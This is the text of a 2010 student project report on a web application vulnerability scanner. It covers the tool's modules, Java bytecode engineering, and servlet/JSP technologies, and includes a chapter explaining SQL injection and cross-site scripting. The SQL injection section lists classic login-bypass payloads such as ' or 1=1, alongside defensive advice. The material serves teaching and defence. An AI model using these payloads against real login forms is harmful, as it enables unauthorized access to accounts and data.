web application scanner
TRANSCRIPT
-
8/9/2019 Web Application Scanner
1/73
WEB APPLICATION SCANNER
A PROJECT REPORT
Submitted by
OMAR FAROOQ.M (22506205304)
TAMJEED AHMED.J (22506205057)
in partial fulfillment for the award of the degree
of
BACHELOR OF TECHNOLOGY
in
INFORMATION TECHNOLOGY
LOYOLA INSTITUTE OF TECHNOLOGY, CHENNAI
ANNA UNIVERSITY:: CHENNAI 600 025
APRIL 2010
-
8/9/2019 Web Application Scanner
2/73
ANNA UNIVERSITY : CHENNAI 600 025
BONAFIDE CERTIFICATE
Certified that this project report WEB APPLICATION SCANNER is the
bonafide work of OMARFAROOQ.M (22506205304), TAMJEEDAHMED.J
(22506205057 ), who carried out the project work under my supervision.
SIGNATURE SIGNATURE
Mr.S.Suresh MS Mr.P.Satish kumar M.EHead of the Department LecturerInformation Technology, Dept of Computer Science
Loyola Institute Of Technology, and Engineering,Palanchur, Chennai - 602 103. Loyola Institute Of Technology,
Palanchur, Chennai - 602 103.
Submitted for University Examination held on .04.10
INTERNAL EXAMINER EXTERNAL EXAMINER
-
8/9/2019 Web Application Scanner
3/73
ACKNOWLEDGEMENT
With deep sense of gratitude, we wish to acknowledge the support and help
extended by all the many people for the successful accomplishment of this work.
First of all, we thank the almighty for giving us the courage to complete this
project.
We owe a special dept of gratitude to Rev. Fr. Dr. ARUL RAJ OMI, our
chairman, Rev. Sr. JEHANI DMI, our secretary, and Sr. SANDHYA DMI, our
administrator for giving motivation in all aspects.
We express our sincere thanks to our respected director and our beloved
principal Dr.N.K.BALUCHAMY, Ph.D., for providing us with adequate
infrastructure and congenial academic environment.
We express our gratitude to, Head of Department of Information Technology
MR.S.SURESH, M.S., whose guidance and encouragement has helped us in
completing this project work. We extend our sincere thanks to our Project
coordinator and internal guide. Mr.P.SATISH KUMAR M.E for giving the
confidence to complete the project successfully by providing the valuable
suggestions and interest at every stage of the project.
We would be failing in our duty if we dont mention the wholehearted
support and technical assistance extended to us by staff members and lab assistants
of our department.
-
8/9/2019 Web Application Scanner
4/73
TABLE OF CONTENTS
CHAPTER NO TITLE PAGE NO
ABSTRACT VI
LIST OF FIGURES VII
LIST OF SYMBOLS/ABBREVIATIONS VIII
1 INTRODUCTION 1
1.1 PROJECT OVERVIEW 1
1.2 EXISTING SYSTEM 11.3 PROPOSED SYSTEM 2
2 PROJECT DESCRIPTION 4
2.1 LITERATURE REVIEW 4
2.2 MODULE DESCRIPTION 5
2.2.1 USER MANAGEMENT 5
2.2.2 CLIENT ACCOUNT LEVEL DATA 5
2.2.3 SERVICE LEVEL DATA 6
2.2.4 GATHERING DATA FROM APPLICATION 6
2.2.5 SCANNING APPLICATION 6
2.2.6 TRACKING ATTACK 7
2.2.7 MAINTAIN LOGS AND REPORTS 7
2.3 METHODOLOGY 7
2.3.1 BYTE CODE ENGINEERING 7
2.3.2 JAVA CLASS FILE FORMAT 9
2.3.3 BYTE CODE INSTRUCTION SET 10
2.3.4 THE BCEL-API 12
-
8/9/2019 Web Application Scanner
5/73
3 SYSTEM REQUIREMENT 15
3.1 REQUIREMENTS SPECIFICATION 15
3.1.1 HARDWARE REQUIREMENT 15
3.1.2 SOFTWARE REQUIREMENT 15
3.2 TECHNOLOGIES 15
3.2.1 SERVLETS
16
3.2.2 JSP 18
3.2.3 JAVASCRIPT 20
4 SYSTEM DESIGN 21
4.1 ARCHITECTURAL DESIGN 21
4.1.1 ARCHITECTURAL STYLES 22
4.2 DATA FLOW MODEL 24
4.2.1 LEVEL 0 DFD 24
4.2.2 LEVEL 1 DFD 24
4.2.3 LEVEL 2 DFD 25
4.3 INTERFACE DESIGN 25
5 ATTACKS 275.1 SQL INJECTION 27
5.2 CROSS SITE SCRIPTING 30
6 TESTING 35
6.1 VALIDATION TESTING
35
6.2 OUTPUT TESTING 36
6.2.1 DEVIATION 36
6.3 SYSTEM TESTING 36
6.4 ACCEPTANCE TESTING 37
7 SCREENSHOTS 38
8 CONCLUSION
-
8/9/2019 Web Application Scanner
6/73
49 8.1 FUTURE ENHANCEMENTS
49
APPENDICES 50
REFERENCE 63
ABSTRACT
Software assurance tools are a fundamental resource for providing an
assurance argument for todays software applications throughout the software
development lifecycle (SDLC). Software requirements, design models, source
code, and executable code are analyzed by tools in order to determine if an
application is secure. This project constitutes a specification for a particular type of
software assurance tool, which is referred to here as a web application security
scanner. A Web application security scanner is an automated program that
examines web applications for potential security vulnerabilities. In addition to
searching for web application-specific vulnerabilities, this tool also look for
software coding errors and maintains a log.
This tool can detect vulnerabilities of the finalized release candidate before
shipping. It simulates a malicious user by attacking and probing, and seeing what
results are not parts of the expected result set. As a dynamic testing tool, it is not
language dependent. A web application scanner is able to scan JAVA/JSP, PHP or
any other engine driven web application.
-
8/9/2019 Web Application Scanner
7/73
LIST OF FIGURES
FIG.NO TITLE
PAGE NO
2.3.2 Java class file format 10
4.1 Architectural diagram of WEB APPLICATION 23
SCANNER
4.2.1 Level 0 DFD 24
4.2.2 Level 1 DFD 24
4.2.3 Level 2 DFD 25
5.2 CROSS-SITE SCRIPTING 33
-
8/9/2019 Web Application Scanner
8/73
LIST OF SYMBOLS/ ABBREVATIONS
J2EE : Java 2 Enterprise Edition is a programming platform part of the
Java Platformfor developing and running distributed multitier architecture
Java applications, based largely on modular software components running
on an application server.
CSS:Casecading style sheet used for designing the HTML content.
HTML: Hypertext Markup Language is a markup language used to designstatic webpages.
HTTP: Hypertext Transfer Protocol is a transaction oriented client/serverprotocol between web browser & a Web Server.
HTTPS: Secure Hypertext Transfer Protocol is a HTTP over SSL (securesocket layer).
TCP/IP: Transmission Control Protocol/Internet Protocol, the suite of
communication protocols used to connect hosts on the Internet. TCP/IP uses
several protocols, the two main ones being TCP and IP.
Dhtmlx: DHTMLX is a JavaScript library which unites numerous products
for creation of rich UI for web applications. The whole interface and
browser-side work of the application can be built merely by using DHTMLX
components. On the other hand we do not limit you there and you can still
create application the way you like using DHTMLX components to
implement some specific functionality.
FusionCharts : Helps you create animated and interactive Flash charts for
web and desktop applications. It livens up your applications by converting
monotonous data into exciting visuals.
-
8/9/2019 Web Application Scanner
9/73
CHAPTER 1
INTRODUCTION
1.1 PROJECT OVERVIEW
As organizations have grown increasingly dependent on online software, the
risk of malicious attacks has also become far more serious. Such attacks can bring
a business to a standstill, cost a company millions of dollars in lost transactions and
potentially tarnish its brand image.
Fortunately, well-governed organizations can protect their Web applications
by injecting vulnerability assessments and ethical hacks into their software devel-
opment and delivery processes. By using automated tools to perform these checks
throughout the online application lifecycle, auditors, developers and quality assur-
ance (QA) professionals can help foil hackers and reduce their companys
exposure to potential business losses.
This application describes the most common hacker attacks and provides
basic rules that can help to create more hack-resistant Web applications.
1.2 EXISTING SYSTEM
Now we are using white-box testing, which has not experienced widespread
use for finding security flaws in web applications.
-It tests only the structure.
-They rely on a database with known bugs.
-It is not automated.
-limited detection capabilities
-
8/9/2019 Web Application Scanner
10/73
-When the coding complexity increases this type of scanning tool fail to detect the
attacks.
1.3 PROPOSED SYSTEM
In practice, black-box vulnerability scanners are used to discover security
problems in web applications
-To increase the confidence in the correctness of our scan results, our tool
also attempts to automatically generate proof-of-concept exploits in certain
cases.
-There is the need for a scanner that covers a broad range of general classes
ofvulnerabilities, without specific knowledge of bugs in particular versions
of web applications.
-Web application scanner uses a black-box approach to crawl and scan web
sites for the presence of exploitable SQL injection and XSS vulnerabilities.
-Our system does not rely on a database of known bugs. Instead, the
distinctive, underlying properties of application-level vulnerabilities are
exploited to detect affected programs.
-Web application scanner has a flexible architecture that consists of
multithreaded crawling, attack, and analysis components.
-With the help of a graphical user interface, the user can configure single or
combined crawling and attack runs.
-These tools operate by launching attacks against an application and
observing its response to these attacks.
-These tools are valuable components when auditing the security of a web
site; they largely lack the ability to identify a prioriunknown instances of
vulnerabilities.
-
8/9/2019 Web Application Scanner
11/73
SCOPE:
i. Customer registration and profile management
ii. Static information about most common risks and vulnerabilities.
iii. Users can see their historical scan data and reports.
iv. Secure access of confidential data (users details). SSL used.
-
8/9/2019 Web Application Scanner
12/73
CHAPTER 2
PROJECT DESCRIPTION
2.1 LITERATURE REVIEW
Now we are using white-box testing, which has not experienced widespread
use for finding security flaws in web applications. An important reason is the
limited detection capability of white-box analysis tools, in particular due to
heterogeneous programming environments and the complexity of applications that
incorporate database, business logic, and user interface components.
In practice, black-box vulnerability scanners are used to discover security
problems in web applications. These tools operate by launching attacks against an
application and observing its response to these attacks. These tools are valuable
components when auditing the security of a web site; they largely lack the ability
to identify aprioriunknown instances of vulnerabilities.
There is the need for a scanner that covers a broad range of general classes
ofvulnerabilities, without specific knowledge of bugs in particular versions of web
applications. Web application scanner uses a black-box approach to crawl and scan
web sites for the presence of exploitable SQL injection and XSS vulnerabilities.
Our system does not rely on a database of known bugs. Instead, the distinctive,
underlying properties of application-level vulnerabilities are exploited to detect
affected programs. To increase the confidence in the correctness of our scan
results, our tool also attempts to automatically generate proof-of-concept exploits
in certain cases. Web application scanner has a flexible architecture that consists of
multithreaded crawling, attack, and analysis components. With the help of a
-
8/9/2019 Web Application Scanner
13/73
graphical user interface, the user can configure single or combined crawling and
attack runs.
2.2 MODULE DESCRIPTION
The word implementation means changing old system to new system that is
adapting new features. Each successive version can incorporate the capabilities of
previous version and provides additional processing function. System
implementation specifies the functional and performance test that must be
performed and standards to be applied to the source code, internal documentation
and external documentation such as the design specification, the test plan, the
users manual, the principles of operation, and the installation and maintenance
procedures. The desired functional and physical audits of source code, documents,
and physical media are specified.
2.2.1 USER MANAGEMENT
In this module, we are going to manage the users i.e., only authorized users
are allowed to use our tool. User will be authenticated based on the user credentials
like user name and password. If they did not provide correct user name and
password they will not be allowed to use our tool. If the user is new to our
application means they will be provided with username and password after
registration. Privileges like retrieving forget password is also available in this
module.
2.2.2 CLIENT ACCOUNT LEVEL DATA
In this module, we are going to maintain the clients information and client
account level data. Admin will maintain clients account level data. Account
number and credit card information like cvv number, bank, and card type will be
-
8/9/2019 Web Application Scanner
14/73
maintained in this module. These details will be provided by the users at the time
of registration.
2.2.3 SERVICE LEVEL DATA
In this module, the privileges for three types of users will be maintained. The
restrictions for the users will be maintained by the admin in this level. Only paid
users are allowed to upload files and scan, other users will not be allowed to use
our application
Privilege for user to access Scanner tool
i. Silver Customer (Free User)
ii. Gold Customer (independent developers)
iii. Platinum Customer (corporate customers)
2.2.4 GATHERING DATA FROM APPLICATION
When the users give the application to scan we have to gather information
about that application. That process will be carried out in this module. We have to
gather sufficient data from the application.
2.2.5 SCANNING APPLICATION
In this module the application given by the user will be scanned. The users
have to upload the executable file, after uploading the executable file our
application will automatically scan the application. Both the request and response
will be scanned in this process.
2.2.6 TRACKING ATTACK
-
8/9/2019 Web Application Scanner
15/73
In this module, users application will be tracked to know how secured the
application is. There are 12 types of hacking; application should not allow those
attacks. Those attacks will be tracked in this module.
2.2.7 MAINTAIN LOGS AND REPORTS
In this module, logs will be maintained. If there is any attack in user
application means it will be tracked in the above modules and the results will be
maintained as a log file and it will be given to the user.
2.3 METHODOLOGY
2.3.1 BYTECODE ENGINEERING
Extensions and improvements of the programming language Java and its
related execution environment (Java Virtual Machine, JVM) are the subject of a
large number of research projects and proposals. There are projects, for instance, to
add parameterized types to Java, to implement Aspect-Oriented Programming, to
perform sophisticated static analysis, and to improve the run-time performance.
Since Java classes are compiled into portable binary class files (called byte
code), it is the most convenient and platform-independent way to implement these
improvements not by writing a new compiler or changing the JVM, but by
transforming the byte code. These transformations can either be performed after
compile-time, or at load-time. Many programmers are doing this by implementing
their own specialized byte code manipulation tools, which are, however, restricted
in the range of their re-usability.
To deal with the necessary class file transformations, we introduce an API
that helps developers to conveniently implement their transformations.
-
8/9/2019 Web Application Scanner
16/73
The Java language has become very popular and many research projects deal
with further improvements of the language or its run-time behavior. The possibility
to extend a language with new concepts is surely a desirable feature, but
implementation issues should be hidden from the user. Fortunately, the concepts of
the Java Virtual Machine permit the user-transparent implementation of such
extensions with relatively little effort.
Because the target language of Java is an interpreted language with a small
and easy-to understand set of instructions (the byte code), developers can
implement and test their concepts in a very elegant way. One can write a plug-in
replacement for the systems class loader which is responsible for dynamicallyloading class files at run-time and passing the byte code to the Virtual Machine.
Class loaders may thus be used to intercept the loading process and transform
classes before they get actually executed by the JVM [LB98]. While the original
class files always remain unaltered, the behavior of the class loader may be
reconfigured for every execution or instrumented dynamically.
The BCEL API (Byte Code Engineering Library), formerly known as
JavaClass, is a toolkit for the static analysis and dynamic creation or
transformation of Java class files. It enables developers to implement the desired
features on a high level of abstraction without handling all the internal details of
the Java class file format and thus re-inventing the wheel every time. BCEL is
written entirely in Java and freely available under the terms of GNU Library Public
License (LGPL)
2.3.2 JAVA CLASS FILE FORMAT
Giving a full overview of the design issues of the Java class file format and
the associated byte code instructions is beyond the scope of this report. We will
-
8/9/2019 Web Application Scanner
17/73
-
8/9/2019 Web Application Scanner
18/73
Fig 2.3.2 Java Class File Format
2.3.3 BYTE-CODE INSTRUCTION SET
The JVM is a stack-oriented interpreter that creates a local stack frame of
fixed size for every method invocation. The size of the local stack has to be
computed by the compiler. Values may also be stored intermediately in a frame
area containing localvariableswhich can be used like a set of registers. These local
variables are numbered from 0 to 65535, i.e. you have a maximum of 65536 oflocal variables. The stack frames of caller and callee method are overlapping, i.e.
the caller pushes arguments onto the operand stack and the called method receives
them in local variables.
-
8/9/2019 Web Application Scanner
19/73
The byte code instruction set currently consists of 212 instructions, 44
opcodes are marked as reserved and may be used for future extensions or
intermediate optimizations within the Virtual Machine. The instruction set can be
roughly grouped as follows:
Stack operations: Constants can be pushed onto the stack either by loading them
from the constant pool with the ldc instruction or with special short-cut
instructions where the operand is encoded into the instructions, e.g. iconst 0 or
bipush (push byte value).
Arithmetic operations: The instruction set of the Java Virtual Machine
distinguishes its operand types using different instructions to operate on values of
specific type. Arithmetic operations starting with i, for example, denote an integer
operation.
Control flow: There are branch instructions like goto and if icmpeq, whichcompares two integers for equality. There is also a jsr (jump sub-routine) and ret
pair of instructions that is used to implement the finally clause of try-catch blocks.
Exceptions may be thrown with the athrow instruction. Branch targets are coded as
offsets from the current byte code position, i.e. with an integer number.
Load and store operations: for local variables like iload and istore. There are also
array operations like iastore which stores an integer value into an array.
Field access: The value of an instance field may be retrieved with getfield and
written with putfield. For static fields, there are getstatic and putstatic counterparts.
-
8/9/2019 Web Application Scanner
20/73
-
8/9/2019 Web Application Scanner
21/73
1. A package that contains classes that describe static constraints of class
files, i.e., reflect the class file format and is not intended for byte code
modifications. The classes may be used to read and write class files from
or to a file. This is useful especially for analyzing Java classes without
having 9 the source files at hand. The main data structure is called
JavaClass which contains methods, fields, etc.
2. A package to dynamically generate or modify JavaClass objects. It may
be used e.g. to insert analysis code, to strip unnecessary information from
class files, or to implement the code generator back-end of a Java
compiler.3. Various code examples and utilities like a class file viewer, a tool to
convert class files into HTML, and a converter from class files to the
Jasmin assembly language [MD97].
In this report we presented the BCEL API that is intended to be a general
purpose tool for byte code engineering. It helps developers to implement analysis
tools or byte code transformations conveniently. It has proved to be useful in
several projects and is not restricted to a special kind of application area. We found
two issues of the API that may be considered as drawbacks: The generic constant
pool is a Add-only data structure, i.e. constant pool entries can be added and
retrieved but not be removed directly.
They are referenced via integer indexes and not some kind of virtual handle.
We think that the removal of entries from the constant pool is rarely an issue and
that implementing the access to it via handles would cause too much overhead.
One would rather write a supplementary tool to strip unnecessary entries from
classes. The second issue may be not to encapsulate instructions into instruction
-
8/9/2019 Web Application Scanner
22/73
handles anymore but to put the necessary code directly into the instructions. Yet
we feel that this would not give us such a clear and elegant level of abstraction as it
does now and we could not share instruction objects.
-
8/9/2019 Web Application Scanner
23/73
CHAPTER 3
SYSTEM REQUIREMENT
3.1 REQUIREMENT SPECIFICATION
3.1.1 HARDWARE REQUIREMENT
Pentium IV at 3 GHz
RAM: 1 GB
Disk Space: 160 GB
3.1.2 SOFTWARE REQUIREMENT
Client on Internet: Web Browser, Operating System
(any)
Web Server: Apache Tomcat 6.0, Operating System
(any)
Data Base Server: MySQL 6.0, Operating System (any)Development End: J2EE, Java, Java Bean, Servlets, HTML,
CSS, Javascript, XML, MySQL, OS
(Windows), Apache Tomcat
3.2 TECHNOLOGIES
J2EE, JSP, SERVLETS: Application Architecture
MYSQL: Database
ECLIPSE: Development Tool
APACHE TOMCAT: Web Server
-
8/9/2019 Web Application Scanner
24/73
3.2.1 SERVLETS
INTRODUCTION:
Servlets are the Java platform technology of choice for extending and
enhancing Web servers. Servlets provide a component-based, platform-
independent method for building Web-based applications, without the performance
limitations of CGI programs. And unlike proprietary server extension mechanisms
(such as the Netscape Server API or Apache modules), servlets are server- and
platform-independent. This leaves you free to select a "best of breed" strategy for
your servers, platforms, and tools.Servlets have access to the entire family of Java APIs, including the JDBC
API to access enterprise databases. Servlets can also access a library of HTTP-
specific calls and receive all the benefits of the mature Java language, including
portability, performance, reusability, and crash protection.
Today servlets are a popular choice for building interactive Web
applications. Third-party servlet containers are available for Apache Web Server,
Microsoft IIS, and others. Servlet containers are usually a component of Web and
application servers, such as BEA WebLogic Application Server, IBM WebSphere,
Sun Java System Web Server, Sun Java System Application Server, and others.
Servlets are Java technology's answer to CGI programming. Building Web
pages on the fly is useful (and commonly done) for a number of reasons:
The Web page is based on data submitted by the user. For example the
results pages from search engines are generated this way and programs that
process orders for e-commerce sites do this as well.
-
8/9/2019 Web Application Scanner
25/73
The data changes frequently. For example, a weather-report or news
headlines page might build the page dynamically, perhaps returning a
previously built page if it is still up to date.
The Web page uses information from corporate databases or other such
sources. For example, you would use this for making a Web page at an on-
line store that lists current prices and number of items in stock.
ADVANTAGES OVER CGI TECHNOLOGIES:
Java servlets are more efficient, easier to use, more powerful, more portable,
and cheaper than traditional CGI and than many alternative CGI-like technologies.(More importantly, servlet developers get paid more than Perl programmers :-).
Efficient: With traditional CGI, a new process is started for each HTTP
request. If the CGI program does a relatively fast operation, the overhead of
starting the process can dominate the execution time. With servlets, the Java
Virtual Machine stays up, and each request is handled by a lightweight Java
thread, not a heavyweight operating system process. Similarly, in traditional
CGI, if there are N simultaneous request to the same CGI program, then the
code for the CGI program is loaded into memory N times. With servlets,
however, there are N threads but only a single copy of the servlet class.
Servlets also have more alternatives than do regular CGI programs for
optimizations such as caching previous computations, keeping database
connections open, and the like.
Convenient: Besides the convenience of being able to use a familiar
language, servlets have an extensive infrastructure for automatically parsing
and decoding HTML form data, reading and setting HTTP headers, handling
cookies, tracking sessions, and many other such utilities.
-
8/9/2019 Web Application Scanner
26/73
Powerful: Java servlets let you easily do several things that are difficult or
impossible with regular CGI. For one thing, servlets can talk directly to the
Web server (regular CGI programs can't). This simplifies operations that
need to look up images and other data stored in standard places. Servlets can
also share data among each other, making useful thing like database
connection pools easy to implement. They can also maintain information
from request to request, simplifying things like session tracking and caching
of previous computations.
Portable: Servlets are written in Java and follow a well-standardized API.
Consequently, servlets written for, say I-Planet Enterprise Server can runvirtually unchanged on Apache, Microsoft IIS, or WebStar. Servlets are
supported directly or via a plug-in on almost every major Web server.
Inexpensive: There are a number of free or very inexpensive Web servers
available that are good for "personal" use or low-volume Web sites.
However, with the major exception of Apache, which is free, most
commercial-quality Web servers are relatively expensive. Nevertheless, once
you have a Web server, no matter the cost of that server, adding servlet
support to it (if it doesn't come preconfigured to support servlets) is
generally free or cheap.
3.2.2 JAVA SERVER PAGES
Java Server Pages (JSP) technology enables Web developers and designers
to rapidly develop and easily maintain, information-rich, dynamic Web pages that
leverage existing business systems. As part of the Java technology family, JSP
technology enables rapid development of Web-based applications that are platform
independent. JSP technology separates the user interface from content generation,
-
8/9/2019 Web Application Scanner
27/73
enabling designers to change the overall page layout without altering the
underlying dynamic content.
ADVANTAGES OF JSP:
vs. Active Server Pages (ASP): ASP is a similar technology from Microsoft.
The advantages of JSP are twofold. First, the dynamic part is written in Java,
not Visual Basic or other MS-specific language, so it is more powerful and
easier to use. Second, it is portable to other operating systems and non-Microsoft Web servers.
vs. Pure Servlets: JSP doesn't give you anything that you couldn't in
principle do with a servlet. But it is more convenient to write (and to
modify!) regular HTML than to have a zillion println statements that
generate the HTML. Plus, by separating the look from the content you can
put different people on different tasks: your Web page design experts can
build the HTML, leaving places for your servlet programmers to insert the
dynamic content.
vs. Server-Side Includes (SSI): SSI is a widely-supported technology for
including externally-defined pieces into a static Web page. JSP is better
because it lets you use servlets instead of a separate program to generate that
dynamic part. Besides, SSI is really only intended for simple inclusions, not
for "real" programs that use form data, make database connections, and the
like.
vs. JavaScript: JavaScript can generate HTML dynamically on the client.
This is a useful capability, but only handles situations where the dynamic
-
8/9/2019 Web Application Scanner
28/73
information is based on the client's environment. With the exception of
cookies, HTTP and form submission data is not available to JavaScript. And,
since it runs on the client, JavaScript can't access server-side resources like
databases, catalogs, pricing information, and the like.
vs. Static HTML: Regular HTML, of course, cannot contain dynamic
information. JSP is so easy and convenient that it is quite feasible to
augment HTML pages that only benefit marginally by the insertion of small
amounts of dynamic data. Previously, the cost of using dynamic data would
preclude its use in all but the most valuable instances.
3.2.3 JAVASCRIPT
JavaScript is a cross-platform, object-oriented scripting language. JavaScript
is a small, lightweight language; it is not useful as a standalone language, but is
designed for easy embedding in other products and applications, such as web
browsers. Inside a host environment, JavaScript can be connected to the objects of
its environment to provide programmatic control over them.
-
8/9/2019 Web Application Scanner
29/73
CHAPTER 4
SYSTEM DESIGN
Object-Oriented Design (OOD) converts the analysis model into design
model that serves as an outside for software construction. The Objects in an
Object-Oriented design are related to the solution to the problem that is being
solved. There may be close relationships between some problem objects and some
solution objects but the designer inevitably has to add new objects and to
implement the solution.
OOD can yield the following benefits:
Maintainability through simplified mapping to the problem domain,
which provides for less analysis effort, less complexity in system design,
and easier verification by the user.
Reusability of the design artifacts, which saves time and costs; and
productivity gains through direct mapping to features of Object-Oriented
Programming Languages.
4.1 ARCHITECTURAL DESIGN
Architectural design is the high level design where the whole
system is divided into different subsystems and the
dependency relationship and communication between them
are also identified. A good architectural design shows the
-
8/9/2019 Web Application Scanner
30/73
dependencies and the primary communication mechanisms
between the various packages.
4.1.1 ARCHITECTURAL STYLES
The builder has used an architectural style as a descriptive mechanism to
differentiate the house from other styles (e.g., A-frame, raised ranch, Cape Cod).But more important, the architectural style is also a pattern for construction
Each style describes a system category that encompasses
(1) A set of components (e.g., a database, computational modules) that
perform a function required by a system.
(2) A set of connectors that enable communication, co ordinations and
cooperation among components.
(3) Constraints that define how components can be integrated to form the
system.
(4) Semantic models that enable a designer to understand the overall
properties of a system by analyzing the known properties.
Data-centered architectures
A data store (e.g., a file or database) resides at the center of this architecture
and is accessed frequently by other components that update, add, delete, or
otherwise modify data within the store.
Data-flow architectures
-
8/9/2019 Web Application Scanner
31/73
This architecture is applied when input data are to be transformed through a
series of computational or manipulative components into output data. A pipe and
filter pattern has a set of components, called filters, connected by pipes that
transmit data from one component to the next.
Layered architectures
A number of different layers are defined, each accomplishing operations
that progressively become closer to the machine instruction set. At the outer layer,
components service user interface operations.
Object-oriented architectures
The components of a system encapsulate data and the operations that must
be applied to manipulate the data. Communication and coordination between
components is accomplished via message passing.
-
8/9/2019 Web Application Scanner
32/73
Fig 4.1 Architectural diagram of WEB APPLICATION SCANNER
Figure 4.1 architectural elements help to identify the application domain of
Web App Scanner. It is designed using various models like structural and
behavioral model, which includes various use-case and activity diagrams. Thus
the project is designed with an overview of the patterns using the UML diagrams.
4.2 DATA-FLOW MODEL
The data flow diagram enables the software engineer to develop models of
the information domain and functional domain at the same time. It takes an input-
process-output view of a system.
4.2.1 LEVEL 0 DFD
-
8/9/2019 Web Application Scanner
33/73
-
8/9/2019 Web Application Scanner
34/73
Fig 4.2.3 Level 2 DFD
4.3 INTERFACE DESIGN
The interface design elements for software tell how information flows into
and out of the system and how it is communicated among the components defined
as part of the architecture. There are three important elements of interface design:
The User Interface (UI)
The External interface to other systems, devices, networks, or other
producers and consumers of information.
The Internal interfaces between various designs components.
-
8/9/2019 Web Application Scanner
35/73
These interface design elements allow the software to communicate
externally and also enable internal communication between the components. Web
App Scanner is developed with the support of the User Interface designs which
facilitates the working of the project. It also describes the various internal
interfaces developed to integrate the modules. The User Interface is the unique
subsystem within the overall Web App Scanner architecture. Design Realization
of analysis classes represents all operations and the messaging schemes and
provides communication and collaboration between operations in various classes
and modules.
CHAPTER 5
ATTACKS
5.1 SQL INJECTION
SQL Injection is one of the many web attack mechanisms used by hackers to
steal data from organizations. It is perhaps one of the most common application
layer attack techniques used today. It is the type of attack that takes advantage of
improper coding of your web applications that allows hacker to inject SQL
-
8/9/2019 Web Application Scanner
36/73
commands into say a login form to allow them to gain access to the data held
within your database.
In essence, SQL Injection arises because the fields available for user input
allow SQL statements to pass through and query the database directly.
SQL INJECTION POSSIBILITIES
Using SQL injections, attackers can:
Add new data to the database
Could be embarrassing to find yourself selling politically incorrect
items on an eCommerce site.
Perform an INSERT in the injected SQL
Modify data currently in the database
Could be very costly to have an expensive item suddenly be deeply
discounted
Perform an UPDATE in the injected SQL
Often can gain access to other users system capabilities by obtaining their
password.
Technologies affected by SQL Injections:
JSPASPXML
XSL JavascriptVB
MFC and other ODBC-based tools
APIs3- and 4GL-based languages such as C, OCI, Pro*C, and
COBOL Perl
CGI scripts that access Oracle databases many more.
Types of SQL Injections
-
8/9/2019 Web Application Scanner
37/73
Blind SQL injections
SQL injections
Advanced SQL injects.
Techniques in SQL Injections
Authorization bypass
Using the SELECT command
Using the INSERT command
Using SQL server stored procedures
How to use SQL injection
Here is a sample basic HTML form with two inputs, login and
password.
The easiest way for the login.asp to work is by building a database
query that looks like this:
SELECT id FROM logins WHERE username = '$username' AND
password = '$password
If the variables $username and $password are requested directly from
the user's input, this can easily be compromised. Suppose that we gave
"Joe" as a username and that the following string was provided as a
password: anything' OR 'x'='x
-
8/9/2019 Web Application Scanner
38/73
SELECT id FROM logins WHERE username = 'Joe' AND password =
'anything' OR 'x'='x'
Make sure that your short term goals will help to achieve the Medium
term goals and vice versa.
As the inputs of the web application are not properly sanitised, the use
of the single quotes has turned the WHERE SQL command into a
two-component clause.
The 'x'='x' part guarantees to be true regardless of what the first part
contains.
This will allow the attacker to bypass the login form without actually
knowing a valid username / password combination!
Depending on the actual SQL query, you may have to try some of
these possibilities:
' or 1=1
or 1=1
or 1=1
' or 'a'='a
" or "a"="a
') or ('a'='a
How to avoid SQL Injections
Filter out character like single quote, double quote, slash, back slash, semi
colon, extended character like NULL, carry return, new line, etc, in all
strings from:
- Input from users
- Parameters from URL
- Values from cookie
-
8/9/2019 Web Application Scanner
39/73
For numeric value, convert it to an integer before parsing it into SQL
statement. Or using ISNUMERIC to make sure it is an integer. Change
"Startup and run SQL Server" using low privilege user in SQL Server
Security tab. Delete stored procedures that you are not using like:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask.
5.2 CROSS SITE SCRIPTING
Have you ever mistyped the address of a web site and received a message
like Error - page name could not be found or The page you requested: page
name does not exist? Certainly you have, and odds are you never gave it a second
thought; you simply corrected the address or went to a different site altogether. It
happens all the time. There are plenty of dead links, or links with typos to stumble
upon. However, when you encounter an error message like the two listed above,
you are actually witnessing a potential security breachnot necessarily against the
site, but rather against you directly.
Suppose you entered the following valid URL:
http://www.example.com/FILENAME.html
If the document "FILENAME.html" did not exist, the web site could return
an error message such as
404 page does not exist: FILENAME.html
....
Notice that "FILENAME.html" is a string that you entered. The web site has
included it in the page returned straight through to your browser.
This may seem harmless, but now imagine that you are browsing through
auctions on a popular site; lets call it auctions.example.com. You come across
several auctions that someone has posted and would like to see more items that the
same person has for sale; lets assume this person is a bad guy (though you dont
-
8/9/2019 Web Application Scanner
40/73
know it) and call him BG12345. You click on BG12345s website and see a listing
of his auctions. You click on a link on his page that interests you and are taken to
auction.example.coms site displaying that item. You scroll down to place a bid,
and the auction site prompts you for your name and password to sign in. You enter
all the information and hit the submit button. Everything looks fine, but in reality,
the information that you submit is getting sent back to BG12345. How can this be?
The answer is that auction.example.com has what is known as a cross-site scripting
(CSS) vulnerability.
A CSS vulnerability is caused by the failure of a site to validate user input
before returning it to the clients web-browser. The essence of cross-site scripting
is that an intruder causes a legitimate web server to send a page to a victim's
browser that contains malicious script or HTML of the intruder's choosing. The
malicious script runs with the privileges of a legitimate script originating from the
legitimate web server. The two error messages mentioned earlier could be
examples of such a situation. If instead of entering a page name, you entered an
HTML or script tag, the server would have returned that command to your
browser, as well. Your browser would assume the HTML or script tag was from
auction.example.com. It would run the script with the privileges that are set up for
that site, and when you looked at the website, everything would appear to be
normal.
BG12345 used the same method to deceive you. When you clicked on the
link to BG12345s auction, the link was actually to an invalid page. The link may
have looked something like the example below, it used HTML and scripting to
mimic the auction sites page exactly. However, when you clicked submit, it used a
form that passed your information back to BG12345. Now BG12345 can access
your account, place bids, and change your information. BG12345 can also change
-
8/9/2019 Web Application Scanner
41/73
your password and lock you out of your own account. Even worse, BG12345 can
see the credit card number that you registered with.
So what did BG12345 do? BG12345s web site offered a link to
auction.example.com that looked something like this:
-
8/9/2019 Web Application Scanner
42/73
Fig 5.2 Cross-Site Scripting Attack
So what can be done?
The best protection is to disable scripting when it isnt required. However,
even this does not prevent the injection of malicious HTML. You should
also protect yourself by accessing security sensitive pages directly instead of
following links from unknown sources, or untrusted sites. For example,
dont trust a link to your banking site that is in an email message. If you
need to access your banking site, go there directly. And, as always, exercise
caution when supplying personal information.
Webmasters can also help. They can ensure that none of their pages return
user input that has not been validated. They can also encourage users to
disable scripting.
Another solution is to have signed scripting such that any script with an
invalid or untrusted signature would not be run automatically. Suggestions
of this nature, however, would require changes to the current Internet
standards and specifications. Such changes would have to be submitted for
-
8/9/2019 Web Application Scanner
43/73
consideration to the World Wide Web Consortium (www.w3c.org) or the
Internet Engineering Task Force (www.ietf.org).
